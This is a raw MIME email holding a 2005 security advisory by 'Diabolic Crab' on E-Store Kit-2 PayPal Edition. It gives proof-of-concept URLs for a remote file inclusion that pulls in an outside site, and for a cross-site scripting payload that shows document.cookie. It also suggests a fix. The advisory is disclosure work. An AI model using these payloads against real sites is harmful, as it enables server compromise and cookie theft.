This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C531B2.E030A030 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: High Title: File inclusion and XSS vulnerability in E-Store Kit-2 PayPal Edition Date: March 26, 2005 Summary: There are file include and xss vulnerabilities in E-Store Kit-2 PayPal Edition. Proof of Concept Exploits: http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=3D0&sid=3D'%22&s= o rtfield=3Dtitle&sortorder=3DASC&pagenumber=3D1&main=3Dhttp://whatismyip.c= om&me nu=3Dhttp://whatismyip.com This results in http://www.whatismyip.com opening up on the server side resulting in possible compromise of the full system and command execution. http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D"><sc ript>alert(document.cookie)</script> This pops the cookie Possible fix: The usage of htmlspeacialchars() and to enable safe mod in php.ini would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ 1d0vpE05jqm5pVr597Zxu9m2 =3DfGEj -----END PGP SIGNATURE----- ------=_NextPart_000_0005_01C531B2.E030A030 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED = MESSAGE-----<BR>Hash:=20 SHA1</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20 href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox= .org/~dcrab</A><BR><A=20 href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><= /FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: File = inclusion and=20 XSS vulnerability in E-Store Kit-2 PayPal<BR>Edition<BR>Date: = March =20 26, 2005</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Summary:<BR>There are file include and = xss=20 vulnerabilities in E-Store Kit-2<BR>PayPal Edition.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=3D0&= sid=3D'%22&so">http://www.magicscripts.com/demo/ms-pe02/catalog.php?c= id=3D0&sid=3D'%22&so</A><BR>rtfield=3Dtitle&sortorder=3DASC&a= mp;pagenumber=3D1&main=3Dhttp://whatismyip.com&me<BR>nu=3Dhttp://= whatismyip.com<BR>This=20 results in <A = href=3D"http://www.whatismyip.com">http://www.whatismyip.com</A>=20 opening up on the server<BR>side resulting in possible compromise of the = full=20 system and command<BR>execution.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D'http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D= "><sc'>http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D= "><sc</A><BR>ript>alert(document.cookie)</script><BR>This = pops the cookie</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Possible fix: The usage of = htmlspeacialchars() and=20 to enable safe mod<BR>in php.ini would solve these = problems.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Author:<BR>These vulnerabilties have = been found and=20 released by Diabolic Crab,<BR>Email:=20 dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free<BR>to = contact me=20 regarding these vulnerabilities. You can find me at,<BR><A=20 href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> = or<BR><A=20 href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox= .org/~dcrab</A>.=20 Lookout for my soon to come<BR>out book on Secure coding with = php.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>-----BEGIN PGP = SIGNATURE-----<BR>Version: PGP 8.1 -=20 not licensed for commercial use: <A=20 href=3D"http://www.pgp.com">www.pgp.com</A></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial=20 size=3D2>iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ= <BR>1d0vpE05jqm5pVr597Zxu9m2<BR>=3DfGEj<BR>-----END=20 PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML> ------=_NextPart_000_0005_01C531B2.E030A030--